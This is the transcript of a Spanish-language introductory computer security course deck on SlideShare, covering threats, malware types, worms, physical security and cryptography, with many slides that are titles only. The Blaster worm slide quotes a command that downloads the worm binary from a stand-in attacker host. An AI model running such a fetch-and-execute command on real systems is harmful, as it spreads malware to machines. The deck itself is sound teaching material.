Your SlideShare is downloading. ×
0
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Seguridad: Introducción a la seguridad informática

947

Published on

Published in: Education
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
947
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
55
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   ¿Qué activos se deben proteger?   • Hardware: estaciones de trabajo, servidores, routers, switches, firewalls, centralitas privadas de telefonía, …  • Software: sistemas operativos y aplicaciones, firmware de los dispositivos de red.  • Datos: almacenados y transferidos a través de una red privada ó pública.   ¿Cómo se protegen estos activos?   • Seguridad física: se definen métodos para garantizar la seguridad del hardware  • Seguridad lógica: se definen métodos para garantizar la seguridad del software y de los datos   Definiciones:   •  Amenaza una persona, cosa, evento o idea que supone algún peligro para un activo (en términos de confidencialidad, integridad, disponibilidad o uso legítimo)  • Ataque: es la realización de una amenaza.  • Defensas: medidas de protección ante las amenazas.  • Vulnerabilidades: puntos débiles en las defensas o inexistencia de éstas.   1    
  • 2. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   2    
  • 3. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   Riesgo   Medida del coste de una vulnerabilidad (teniendo en cuenta la ejecución de un ataque exitoso). El riesgo es  alto si valor_activo*probailidad_exito_ataque es elevada. El riesgo es bajo si valor_activo*probailidad_exito_ ataque es bajo.   Ejemplo de modelo para la valoración del riesgo de un activo   Metodologías para valoración de riesgos:   • CERT  • Microsoft  • NIST   3    
  • 4. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   ¿Es posible proteger totalmente un activo?   Cuatro condiciones son necesarias para considerar que un activo informático está asegurado casi al 100%:  • Confidencialidad: la información es almacenada o enviada a través de la red oculta para cualquier usuario excepto para el destinatario final. Se suele garantizar la confidencialidad con el cifrado de la información.  • Autenticación: la persona, proceso o activo que acceda a la información debe previamente ser autenticado. La autenticación puede conseguirse mediante uno (o más de uno) de los siguientes factores:   • Integridad: protección de datos ante la modificación de la información. Este servicio se facilita mediante un mecanismo de criptografía denominado Message Authentication Code o firma digital.  • No repudio: cualidad por la que una persona u ordenador no puede negar haber realizado una transmisión.   Modelo de red segura   4    
  • 5. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas físicas   Dentro de las amenazas físicas podemos englobar cualquier error o daño en el hardware que se puede presentar en cualquier momento. Por ejemplo, daños en discos duros, en los procesadores, errores de funcionamiento de la memoria, etc. Todos ellos hacen que la información o no esté accesible o no sea fiable.   Otro tipo de amenazas físicas son las catástrofes naturales. Por ejemplo hay zonas geográficas del planeta en las que las probabilidades de sufrir terremotos, huracanes, inundaciones, etc, son mucho mas elevadas. En estos casos en los que es la propia Naturaleza la que ha provocado el desastre de seguridad, no por ello hay que descuidarlo e intentar prever al máximo este tipo de situaciones.   Hay otro tipo de catástrofes que se conocen como de riesgo poco probable. Dentro de este grupo tenemos los  taques nucleares, impactos de meteoritos, etc. y que, aunque se sabe que están ahí, las probabilidades de que se desencadenen son muy bajas y en principio no se toman medidas contra ellos.   Windsord   Indonesia Robos Fokushima   Corte eléctrico   5    
  • 6. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)   Existen desde mediados de los ’80. Inicialmente la distribuciyn se realizaba a partir de la tecnología de  intercambio de información más popular: el diskette. Desde entonces, los avances en las tecnologías de redes y en los diversos servicios de intercambio de informaciyn han sido aprovechados por formas diversas de “cydigo malicioso”:  • Virus: malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o   el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, no se replican a sí mismos porque no tienen esa facultad como el gusano informático, son muy  nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos  • Spyware: Programas espía que recopilan información sobre una persona o una organización sin su   conocimiento. Esta información luego puede ser cedida o vendida a empresas publicitarias. Pueden recopilar información del teclado de la víctima pudiendo así conocer contraseña o nº de cuentas bancarias o pines.  • Adware: Programas que abren ventanas emergentes mostrando publicidad de productos y servicios. Se suele utilizar para subvencionar la aplicación y que el usuario pueda bajarla gratis u obtener un descuento. Normalmente el usuario es consciente de ello y da su permiso.  • Worms (“Gusanos”): tienen la capacidad de replicarse a si mismos y son independientes de otros programas o componentes de software. Infectan todos los host de una red gracias a la infraestructura de datos actual.  • Troyanos. Programas con “doble cara”: exterior benigno, interior destructivo. Al ejecutar el programa el usuario suele ser distraído por un programa afable mientras que en background se está ejecutando otra aplicación con fines dudosos, generalmente suele ser una puerta trasera o backdoor.  • Phising: Intenta conseguir información confidencial de forma fraudulenta (conseguir contraseñas o pines   bancarios) haciendo una suplantación de identidad. Para ello el estafador se hace pasar por una persona o  empresa de la confianza del usuario mediante un correo electrónico oficial o mensajería instantánea, y de esta forma conseguir la información.  • Spam: Recepción de mensajes no solicitados. Se suele utilizar esta técnica en los correos electrónicos, mensajería instantánea y mensajes a móviles.  • Bots: programas que realizan de forma automática acciones que podría hacer una persona. Crear usuarios irreales en webs, realizar ataques de diccionario o fuerza bruta, …   6    
  • 7. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)   La palabra “hacker” originalmente no tenía una connotaciyn negativa: “personas que disponían de un elevado  conocimiento tecnolygico sobre ordenadores”. La acepciyn actual del término tiene su origen el los años 50 y 60, cuando el acceso a los ordenadores era muy caro y muy limitado y, por lo tanto, la disponibilidad de tiempo de proceso estaba altamente controlada.   El colectivo hacker no es homogéneo:  • White Hat o ethical hackers: hackers especializados en metodologías de penetración cuyo objetivo es   mejorar la seguridad de los sistemas informáticos de las empresas. También conocidos como sneakers.  • Black Hat: hackers que vulneran los sistemas informáticos con intenciones maliciosas o de lucro personal.  • Grey Hat: es una combinación de White y Black Hat. Hacker que vulnera un sistema informático y se ofrece   a la empresa para solucionar el problema.  •, Scipt Kiddies: hackers con bajos conocimientos que explotan las vulnerabilidades de los sistemas informáticos con herramientas de terceros. • Hacktivist, Blue Hat, Neophyte, … 7    
  • 8. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Fases del ataque de un hacker   8    
  • 9. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   9    
  • 10. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   10    
  • 11. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   11    
  • 12. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   12    
  • 13. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Virus   El primer virus catalogado como tal, Brain virus, escrito por Basit y Amjad Alvi en Pakistan, apareció en el año 1986. Estos virtuosos desarrolladores de software crearon a Brain con la única intención de proteger, ante el emergente "pirateo", los programas que ellos mismos creaban y comercializaban en su tienda Brain Computer Services. No tenía payload.   Este virus, inusualmente dañino fue problemático para los usuarios del sistema operativo MS-DOS. Se alojaba en el Boot o sector de arranque de los disquetes de 5.25 pulgadas que contenían el sistema operativo en una versión inferior a la 2.0, En una primera instancia, cambiaba la etiqueta de volumen en los disquetes por la de (c)Brain o similar (atendiendo a la versión) y antes de producir la infección mostraba el siguiente mensaje:   ¿Cómo se replican los virus?   Memory    Chicks.exVirus  Hard  Drive     Draw.exe    Calc.exe    Chicks.exVirus     13    
  • 14. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los virus?   Memory    Chicks.exVirus  Hard  Drive     Chicks.exVirus  Draw.exe     Calc.exe    Chicks.exVirus     Chicks.exVirus     Memory  Virus    Hard  Drive    Draw.exe     Calc.exe    Chicks.exVirus    
  • 15. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los virus?   Chicks.exVirus     Chicks.exVirus     MemoryCalc.exe  Virus    Hard  Drive    Draw.exe     Calc.exeVirus    Chicks.exVirus     Memo  Virus    Hard  DriveDraw.exe     Calc.exeVirus    Chicks.exVirus    
  • 16. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Payload   La gran mayoría de virus no contienen payload, efectos secundarios intencionados, generalmente impiden la ejecución del fichero infectado solamente. Los payloads más comunes son:  • Modificar Datos • Exportar Datos • Grabar voz y exportar • Capturas de teclado y exportar • Interceptar comunicaciones y exportar • Cifrado de los datos locales • Destrucción de los datos locales • Marcado telefónico • Insertar otro código malicioso • Exportar Passwords Existen más de 70.000 virus distintos, pero los más comunes son los basados en WIN32.   Técnicas de ocultación de los virus   • Cifrado  • Stealth: habilidad para devolver información falsa y así   no ser detectados  • Retrovirus: atacan directamente al software antivirus. Normalmente borran, cambian las firmas o paran los   servicios del antivirus.  • Polimorfismo: habilidad de mutar cada vez que infectan una aplicación, disco o documento. Algunos pueden   llegar a tener hasta millones de formas diferentes. Este tipo de virus es más difícil de detectar por los antivirus.   Stealth  Virus     La casa  está por   allí…   Todo  parece estar bien   16    
  • 17. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Antivirus   Los Antivirus utilizan firmas de virus para la identificación. Esta firmas son únicas para cada virus, como la huella digitales son únicas para los humanos. El antivirus tiene una base de datos de firmas que se va actualizando.   Heurística: técnicas que se emplean para conocer código malicioso que no se encuentra en su base de datos. Su importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos códigos maliciosos de los que no se posea firmas.   Un antivirus está formado por las firmas o definiciones de virus, motor y la aplicación.   Para saber si tu antivirus está funcionando correctamente crea un fichero .txt con el siguiente contenido:  X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*. No es un virus real, pero tu antivirus lo detectará como tal. (www.eicar.com)   Métodos de análisis de virus   BlackBox  1. Se instalan varios programas de monitorización: monitorización del sistema de ficheros, registro, memoria, actividad en la red, …  2. Se ejecuta el virus  3. Se comprueban los resultados de los programas de monitorización   17    
  • 18. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Métodos de análisis de virus WhiteBox   Script virus son normalmente fáciles: se analiza el contenido de los scripts  Macro virus son normalmente fáciles: se extrae el código macro del documento. Se analiza el contenido de las macros  El codigo Binario puede ser complicado: programa Disassemble main() {  demo.c   printf ("Demo n");   return 0; Compilador }   demo.exe   0E 1F BA 0E 00 B4 09 CD 21 B8 Demo   demo.exe   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63  61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07  00 00 00 83 C4 04 33 C0 5D C3 93 11 04 55   4C CD 21  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07 00 00 00 83 C4 04 33 C0 5D C3 demo.c1 04 55   Tenemos la necesidad de dar   Assembler 3591:0000 0E PUSH CS   información detallada tan rápido como sea posible a nuestro clientes:  • WhiteBox es más lento pero más   detallado y exacto  • BlackBox es más rápido pero   menos detallado y exacto   main()   {   printf ("Demo de postgrado n")  return 0;  }   3591:0001 1F POP DS  3591:0002 BA0E00 MOV DX,000E 3591:0005 B409 MOV AH,09  3591:0007 CD21 INT 21  3591:0009 B8014C MOVAX,4C01 3591:000C CD21 INT 21   18    
  • 19. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Worms (gusanos)   Un worm es un programa que se copia de un PC a otro. A diferencia de los virus, los worms no son parásitos y no necesitan un host para infectar. Conocen la red y/o Internet. Se expanden a muchos PCs muy rápido . Necesitan menos intervención del humano para replicarse. Ejemplos: VBS.LoveLetter.A ; SQLexploit, Blaster ...   ILOVEYO     LISA  !!!  ILILOVEYOU     ILOVEYO     ILOVEYOU     YOU     ILOVEYOU     OU    ILOV     Payload   VEY     ILOV     Steve acaba de enviar LoveLetter a todos en su libreta de direcciones   • Expande el worm a TODO EL MUNDO en tu Microsoft Outlook address book vía Email o por mIRC   (Internet Chat): a todos tus amigos, todos en tu empresa, todos tus clientes…  • Sobrescribe tus ficheros locales/red con las siguientes extensiones con el código del worm y añade la   extensión VBS vbs, vbe, js, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com,  mp3 and mp2 (Ejemplo. hello.gif -> hello.gif.vbs)  • Cambia la pagina de inicio de Microsoft Internet Explorer para bajar Password Stealer Trojan. Tu información   RAS, ISP se envía al hacker. Modificaciones del Registro: sistema inestable debido a los cambios en el registro   19    
  • 20. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los gusanos? (Buffer overflow)   Es  un  error  de  soFware  que  se  produce  cuando  un  programa  no  controla  adecuadamente  la  canJdad  de  datos  que  se    copian  sobre  un  área  de  memoria  reservada  a  tal  efecto  (buffer),  de  forma  que  si  dicha  canJdad  es  superior  a  la  capacidad preasignada  los  bytes  sobrantes  se  almacenan  en  zonas  de  memoria  adyacentes,  sobrescribiendo  su  contenido  original.  Esto consJtuye  un  fallo  de  programación.     En  las  arquitecturas  comunes  de  computadoras  no  existe  separación  entre  las  zonas  de  memoria  dedicadas  a  datos  y  las    dedicadas  a  programa,  por  lo  que  los  bytes  que  desbordan  el  buffer  podrían  grabarse  donde  antes  había  instrucciones,  lo  que implicaría  la  posibilidad  de  alterar  el  flujo  del  programa,  llevándole  a  realizar  operaciones  imprevistas  por  el  programador original.  Esto  es  lo  que  se  conoce  como  una  vulnerabilidad.     Es el área de memoria que se usa para mantener temporalmente la información. La pila del pc es un área de memoria re-escribible que dinámicamente se encoge o estira según lo necesite o determine el programa en ejecución. La acción de poner y quitar información de la pila funciona como LIFO. (Last In, First Out)   Para prevenir BufferOverflows:  • El usuario necesita que se saque un parche • Los desarrolladores deberían escribir código si errores • Análisis de código buscando código sospechoso • Compiladores que buscan o previenen stack overflows   20    
  • 21. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de ataque: W32.Blaster   El pc infectado busca por la red pc´s que estén escuchando en el puerto 135   Cuando descubre un PC escuchando el puerto 135 , el pc atacante intenta explotar el RPC Buffer Overflow   El Buffer Overflow incluye código que hace que la victima abra un command shell , y se ponga a escuchar al puerto 4444   El el atacante empieza un TFTP en el puerto 69 (el cliente TFTP esta incluido en las instalaciones por defecto), conecta al puerto 4444 y lanza el comando “tftp attacker-IP GET msblast.exe”   21    
  • 22. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de ataque: W32.Blaster   El cual ejecuta la victima, y entonces se baja una copia del worm desde el atacante.A continuación lo ejecuta (el puerto 4444 no permanece abierto)   La victima es ahora un atacante y empieza su proceso de búsqueda, la máquina atacante primera, vuelve a la búsqueda otra vez.   22    
  • 23. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Es difícil hacer un virus/gusano?   En Internet se pueden encontrar herramientas para generar tus propios virus o worms   23    
  • 24. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Troyanos   Código que generalmente muestra una aplicación afable al usuario y que de forma paralela ejecuta otra maliciosa en background. Esta aplicación maliciosa suele abrir un puerto de conexión para que un hacker pueda conectarse a la máquina infectada (backdoor) o lanza una conexión cliente contra el server de un hacker con el mismo propósito.   24    
  • 25. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Troyanos   ¿Es difícil crear un troyano?   Esheep.exe   25    
  • 26. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   Ahora el código malware utiliza varios métodos para expandirse (mail, Irc, red, ...) y cada vez necesitan menos la interacción del usuario, como hacer doble click en el fichero adjunto. Algunos ejemplos de amenazas mixtas son: Codered , nimda, bugbear.B   26    
  • 27. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   27    
  • 28. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   28    
  • 29. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   29    
  • 30. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   30    
  • 31. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   3. SEGURIDAD FÍSICA   Consiste en la aplicación de barreras físicas y procedimientos de control como medidas de prevención y contramedidas contra las amenazas a los recursos y la información confidencial.   En muchas organizaciones se suelen tomar medidas para prevenir o detectar accesos no autorizados o negaciones de servicio, pero rara vez para prevenir la acción de un atacante que intenta acceder físicamente a la sala de  operaciones o al lugar donde se depositan las impresiones del sistema. Esto motiva que en determinadas  situaciones un atacante se decline por aprovechar vulnerabilidades físicas en lugar de lógicas, ya que posiblemente le sea más fácil robar una cinta con una imagen completa del sistema que intentar acceder a él mediante fallos en el software.   En entornos habituales suele ser suficiente con un poco de sentido común para conseguir una mínima seguridad  física; de cualquier forma, en cada institución se ha de analizar el valor de lo que se quiere proteger y la probabilidad de las amenazas potenciales, para en función de los resultados obtenidos diseñar un plan de seguridad adecuado. Por ejemplo, en una empresa ubicada en Valencia quizás parezca absurdo hablar de la prevención ante terremotos (por ser esta un área de bajo riesgo), pero no sucederá lo mismo en una universidad situada en una zona sísmicamente activa; de la misma forma, en entornos de I+D es absurdo hablar de la prevención ante un ataque nuclear, pero en sistemas militares esta amenaza se ha de tener en cuenta.   Amenazas al hardware de una instalación informática:   • Acceso físico a los sistemas con autenticación basado en algo que el usuario sabe (clave), posee (tarjeta) o/y es (biometría). Los sistemas, equipos de comunicación, cableado troncal y conexión con los proveedores de servicio de voz y datos deben estar cerrados bajo llave en un recinto acondicionado climatológicamente (CPD-Centro de procesado de Datos) con un sistema de autenticación basado en al menos uno de los métodos mencionados. Otros: videocámaras, alarmas, detectores de presencia y térmicos, …  • Desastres naturales: terremotos, tormentas eléctricas, inundaciones, incendios, humedad, ruido eléctrico, temperaturas extremas, … Como medida de prevenciyn se aconseja realizar backups periódicamente de la información y trasladarla físicamente a otro lugar.   Es importante mantener a los empleados y al personal de seguridad alerta ante ataques de ingeniería social, shoulder surfing, masquerading, scavenging y actos delictivos.   31    
  • 32. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   3. SEGURIDAD FÍSICA   32    
  • 33. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   Seguridad en el uso de software y los sistemas, la protección de los datos, procesos y programas, así como la del acceso ordenado y autorizado de los usuarios a la información.   Objetivos:   • Restringir el acceso a los programas y archivos.  • Asegurar que los operadores puedan trabajar sin una supervisión minuciosa y no puedan modificar los   programas ni los archivos que no correspondan.  • Asegurar que se estén utilizados los datos, archivos y programas correctos en y por el procedimiento correcto.  • Que la información transmitida sea recibida sólo por el destinatario al cual ha sido enviada y no a otro.  • Que la información recibida sea la misma que ha sido transmitida.  • Que existan sistemas alternativos secundarios de transmisión entre diferentes puntos.  • Que se disponga de pasos alternativos de emergencia para la transmisión de información.   CRIPTOGRAFÍA                                 Cuanto mayor es la longitud de la clave menor es la probabilidad de crackeo   33    
  • 34. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   IDEA,  RC5,  DES,  3DES,  AES     34    
  • 35. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   Diffie-­‐Hellman,  RSA,    Massey-­‐Omura,  Elgamal, Miller     35    
  • 36. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   Se  pueden  definir  como  documentos  digitales  firmados  por  una  enJdad  tercera  confiable  (PKI)que  conJene   una  clave  privada  totalmente  transparente  para  el  usuario,  y  que  conJenen  información  sobre  este,     compuestos  ademas  por  una  clave  publica,  donde  aparece  información  del  propietario  de  dicha  clave.  Con     lo  anterior,  lo  que  se  pretende  es  asociar  la  clave  publica  con  la  idenJdad  de  una  persona  fisica  o  juridica  y     por  lo  tanto  poder  probar  la  autenJcidad  del  remitente  de  un  documento  firmado  electronicamente.       36    
  • 37. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA     36    
  • 38. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   37    
  • 39. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   38    
  • 40. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   39    
  • 41. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   40    
  • 42. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   41    
  • 43. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   42    
  • 44. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   43    
  • 45. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   44    
  • 46. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Algoritmos de hash (integridad de los datos): no necesitan una clave   45    
  • 47. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Algoritmos de hash (integridad de los datos)   46    
  • 48. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Las firmas digitales garantizan la integridad y la autenticidad del mensaje: 1.  Se pasan los datos por un algoritmo de hash que genera una cadena de bits que son anexados a los datos. 2. Antes de de enviar el mensaje se cifra con un algoritmo asimétrico utilizando la clave privada del remitente. La firma digital además permite añadir un sello temporal o timestamp que permite determinar si el mensaje ha sido interceptado. Esto es importante por ejemplo en transacciones económicas.   46    
  • 49. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   47    
  • 50. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   48    
  • 51. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   49    
  • 52. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   50    
  • 53. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   51    
  • 54. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   52    
  • 55. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   53    
  • 56. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   54    
  • 57. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   55    
  • 58. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   56    
  • 59. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   57    
  • 60. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   58    
  • 61. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   59    
  • 62. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   60    
  • 63. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   61    
  • 64. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   62    
  • 65. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   63    
